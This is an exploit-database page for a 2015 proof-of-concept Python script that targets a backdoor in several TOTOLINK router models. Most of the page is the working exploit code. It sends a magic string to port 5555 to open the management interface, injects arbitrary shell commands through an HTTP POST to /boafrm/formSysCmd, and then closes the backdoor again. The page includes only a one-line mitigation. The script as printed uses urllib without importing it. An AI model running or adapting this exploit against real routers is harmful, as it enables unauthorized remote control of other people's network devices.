header-logo
Suggest Exploit
vendor:
A850R-V1, F1-V2, F2-V1, N150RT-V2, N151RT-V2, N300RH-V2, N300RH-V3, N300RT-V2
by:
MadMouse
7.5
CVSS
HIGH
Backdoor and RCE
284
CWE
Product Name: A850R-V1, F1-V2, F2-V1, N150RT-V2, N151RT-V2, N300RH-V2, N300RH-V3, N300RT-V2
Affected Version From: A850R-V1, F1-V2, F2-V1, N150RT-V2, N151RT-V2, N300RH-V2, N300RH-V3, N300RT-V2
Affected Version To: Latest firmware
Patch Exists: YES
Related CWE: N/A
CPE: h:totolink:a850r-v1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: A850R-V1
2015

TOTOLINK backdoor and RCE exploit POC

This exploit allows an attacker to gain access to the management interface of TOTOLINK routers and execute arbitrary commands on the device. The exploit works on A850R-V1, F1-V2, F2-V1, N150RT-V2, N151RT-V2, N300RH-V2, N300RH-V3, N300RT-V2 until the last firmware. The exploit is triggered by sending a specific string to the router on port 5555.

Mitigation:

Disable remote access to the router and ensure that the router is running the latest firmware.
Source

Exploit-DB raw data:

# Exploit Title: TOTOLINK backdoor and RCE exploit POC
# Google Dork: N/A
# Date: Thu Aug 13 07:33:29 MDT 2015
# Exploit Author: MadMouse
# Vendor Homepage: http://www.totolink.net/
# Software Link:
http://www.totolink.net/include/download.asp?path=down/010100&file=TOTOLINK%20A850R-V1_1.0.1_20150725.zip
# Version: A850R-V1 : until last firwmware
TOTOLINK-A850R-V1.0.1-B20150707.1612.web, F1-V2 : until last firmware
F1-V2.1.1-B20150708.1646.web, F2-V1 : until last firmware
F2-V2.1.0-B20150320.1611.web, N150RT-V2 : until last firmware
TOTOLINK-N150RT-V2.1.1-B20150708.1548.web, N151RT-V2 : until last firmware
TOTOLINK-N151RT-V2.1.1-B20150708.1559.web, N300RH-V2 : until last firmware
TOTOLINK-N300RH-V2.0.1-B20150708.1625.web, N300RH-V3 : until last firmware
TOTOLINK-N300RH-V3.0.0-B20150331.0858.web, N300RT-V2 : until last firmware
TOTOLINK-N300RT-V2.1.1-B20150708.1613.web
# Tested on: A850R-V1
# CVE : N/A
# Credit: https://pierrekim.github.io/advisories/2015-totolink-0x02.txt



#!/usr/bin/env python
#
------------------------------------------------------------------------------
# THE SCOTCH-WARE LICENSE (Revision 43):
# <aaronryool@gmail.com> wrote this file. As long as you retain this notice
you
# can do whatever you want with this stuff. If we meet some day, and you
think
# this stuff is worth it, you can buy me a shot of scotch in return
#
------------------------------------------------------------------------------
import socket, sys

if len(sys.argv) < 2:
    print("Usage: %s <ip> <command string>...\x1b[0m" % sys.argv[0])
    exit(1)

commandstr = urllib.quote_plus(" ".join(sys.argv[2:]))

def check_activate_backdoor():
    try:
        vulnerable = "hel,xasf"     # this is both the check, and the
command to open the management interface to the internet
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send(vulnerable)
        ret = True if s.recv(len(vulnerable)) == vulnerable else False
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" %
sys.exc_info()[0])
        exit(2)
    return ret

def close_backdoor():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 5555))
        s.send("oki,xasf")
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" %
sys.exc_info()[0])
        exit(2)
    return

if check_activate_backdoor():
    print("\x1b[032mThis device appears to be vulnerable\nbackdoor
activated\x1b[0m")
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((sys.argv[1], 80))
        s.send("POST /boafrm/formSysCmd
HTTP/1.1\r\n\r\nsysCmd=%s&apply=Apply&msg=\r\n\r\n" % commandstr)

        print("\x1b[032mCommands sent\x1b[0m")
        print("\x1b[032mResponse: \n%s\x1b[0m" % s.recv(512))
        s.close()
    except:
        print("\x1b[031mThis just happened: \x1b[037m%s\x1b[0m" %
sys.exc_info()[0])
        exit(2)
    close_backdoor()
    exit(0)
else:
    print("\x1b[032mThis device isn't vulnerable lol\x1b[0m")
    exit(1)

Navigation

Suggest Exploit

Services By CQR